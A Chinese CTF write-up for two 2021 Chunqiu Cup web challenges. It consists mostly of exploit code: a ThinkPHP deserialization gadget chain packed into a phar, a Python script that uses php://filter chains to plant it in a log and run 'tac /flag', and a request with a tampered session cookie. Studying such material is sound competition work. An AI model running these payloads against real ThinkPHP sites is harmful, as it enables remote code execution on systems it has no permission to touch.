【wp】ctf-2021春秋杯

  • A+
所属分类:CTF专场
ctf-2021春秋杯

【wp】ctf-2021春秋杯



easy_filter


<?phpnamespace think{    abstract class Model{        protected $append = [];        private $data = [];        function __construct(){            $this->append = ["ethan"=>["dir","calc"]];            $this->data = ["ethan"=>new Request()];        }    }    class Request{        protected $hook = [];        protected $filter = "system";        protected $config = [        // 表单请求类型伪装变量        'var_method'       => '_method',        // 表单ajax伪装变量        'var_ajax'         => '_ajax',        // 表单pjax伪装变量        'var_pjax'         => '_pjax',        // PATHINFO变量名 用于兼容模式        'var_pathinfo'     => 's',        // 兼容PATH_INFO获取        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],        // 默认全局过滤方法 用逗号分隔多个        'default_filter'   => '',        // 域名根,如thinkphp.cn        'url_domain_root'  => '',        // HTTPS代理标识        'https_agent_name' => '',        // IP代理获取标识        'http_agent_ip'    => 'HTTP_X_REAL_IP',        // URL伪静态后缀        'url_html_suffix'  => 'html',        ];        function __construct(){        $this->filter = "system";        $this->config = ["var_ajax"=>''];        $this->hook = ["visible"=>[$this,"isAjax"]];        }    }}

namespace thinkprocesspipes{ use thinkmodelconcernConversion; use thinkmodelPivot; class Windows{ private $files = []; public function __construct(){ $this->files=[new Pivot()]; } }}namespace thinkmodel{ use thinkModel; class Pivot extends Model{

}}namespace { use thinkprocesspipesWindows; // echo base64_encode(serialize(new Windows())); @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new Windows(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering();}/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/?>


cat phar.phar | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"


import requests# host = "http://127.0.0.1:80/public"host ='http://eci-2ze5b7k5rcrtgb6lqz3z.cloudeci1.ichunqiu.com/index.php'burp0_url = host + "/index/index/hello?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp0_url)burp00_url = host + "/index/index/hello?file=AA"requests.get(burp00_url)burp01_url = host + "/index/index/hello?file=AA=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=42=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=4C=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4E=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=4D=00=30=00=4F=00=69=00=49=00=41=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=41=00=47=00=5A=00=70=00=62=00=47=00=56=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=50=00=4F=00=6A=00=45=00=33=00=4F=00=69=00=4A=00=30=00=61=00=47=00=6C=00=75=00=61=00=31=00=78=00=74=00=62=00=32=00=52=00=6C=00=62=00=46=00=78=00=51=00=61=00=58=00=5A=00=76=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=68=00=63=00=48=00=42=00=6C=00=62=00=6D=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=61=00=58=00=49=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=4D=00=69=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=41=00=48=00=52=00=6F=00=61=00=57=00=35=00=72=00=58=00=45=00=31=00=76=00=5A=00=47=00=56=00=73=00=41=00=47=00=52=00=68=00=64=00=47=00=45=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=55=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=36=00=4D=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6F=00=62=00=32=00=39=00=72=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=64=00=6D=00=6C=00=7A=00=61=00=57=00=4A=00=73=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=6A=00=6F=00=35=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6D=00=6C=00=7A=00=51=00=57=00=70=00=68=00=65=00=43=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=5A=00=70=00=62=00=48=00=52=00=6C=00=63=00=69=00=49=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=64=00=6D=00=46=00=79=00=58=00=32=00=46=00=71=00=59=00=58=00=67=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=44=00=6F=00=69=00=49=00=6A=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=2F=00=4D=00=65=00=78=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=61=00=47=00=63=00=79=00=42=00=72=00=68=00=73=00=64=00=4D=00=44=00=44=00=74=00=71=00=69=00=66=00=74=00=4A=00=7A=00=4D=00=71=00=41=00=6B=00=4B=00=46=00=49=00=49=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00"requests.get(burp01_url)burp02_url = host + "/index/index/hello?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp02_url)burp03_url = host + "/index/index/hello?file=phar:///var/www/html/runtime/log/202105/29.log&id=tac /flag"res = requests.get(burp03_url)print(res.text)


【wp】ctf-2021春秋杯

flag{d94da2d7-574e-46b6-87a3-33c90fe3767a}



ctftaker


源码


【wp】ctf-2021春秋杯


POST /levelup HTTP/1.1Host: eci-2zebjnza8y58psty4hey.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1620482691; UM_distinctid=1794c4ba07562-01cbdedfb764ce8-c791039-1aeaa0-1794c4ba0769b9; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; __jsluid_h=954b9eeb8fc650893eb6696dbe7afbe5; session=eyJoaXN0b3J5IjpbIuS9oOaYr+S4gOS9jeWLh+aVoueahGN0ZmVyIiwi5ZCs6K+05Zyo6YGl6L+c55qE5b285bK4Iiwi5a2Y5Zyo552A5LiA5Liq56We56eY5bel5YW3Iiwi5Lyg6K+05Y+q6KaB6I635b6X5LqG6L+Z5Liq5bel5YW3Iiwi5bCx5Y+v5Lul5LiA6ZSuIHB5dGhvbjMgLi9leHAucHkgaXAgcG9ydCDmi79zaGVsbCIsIuS4uuS6hui1ouW+l+avlOi1m++8jOi1sOS4iuS6uueUn+W3heWzsO+8jOS9oOS4jemhvuaXgeS6uueahOmEmeinhuS4juWKnemYu++8jOavheeEtuWGs+eEtueahOi1sOS4iuS6hui/meadoei3r+OAgiIsIuato+WcqOeUn+aIkOaAqueJqVtkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS5bZGVsYXkoMTAwMCldLltkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS4iXSwicGxheWVyIjp7Im5hbWUiOiJQbGF5ZXIiLCJmYWN0b3IiOjk5OTk5OTk5OSwiQVRLIjo5OTk5OTksIkRFRiI6OTk5OTk5OTksIkhQIjo5OTk5OTk5OTl9LCJjb2luIjoxLCJpbml0Ijp0cnVlLCJtb25zdGVyIjpbXX0=; session.sig=pvQuGF6QvbkG8T1pL9isXJmifzUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/jsonContent-Length: 18
{"f":"12222+2222"}


获取大量攻击力等等


【wp】ctf-2021春秋杯


带着cookie 多次请求

得到flag


【wp】ctf-2021春秋杯


把[delay(1000*10)]替换成空


【wp】ctf-2021春秋杯


flag{fc2b633a-5f4a-4d26-94bf-3f152d4872b0}


更多CTF-Wrietup 请关注EDI安全!
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步


EDI安全

EDI安全

【wp】ctf-2021春秋杯

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(bgbing安全):【wp】ctf-2021春秋杯

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: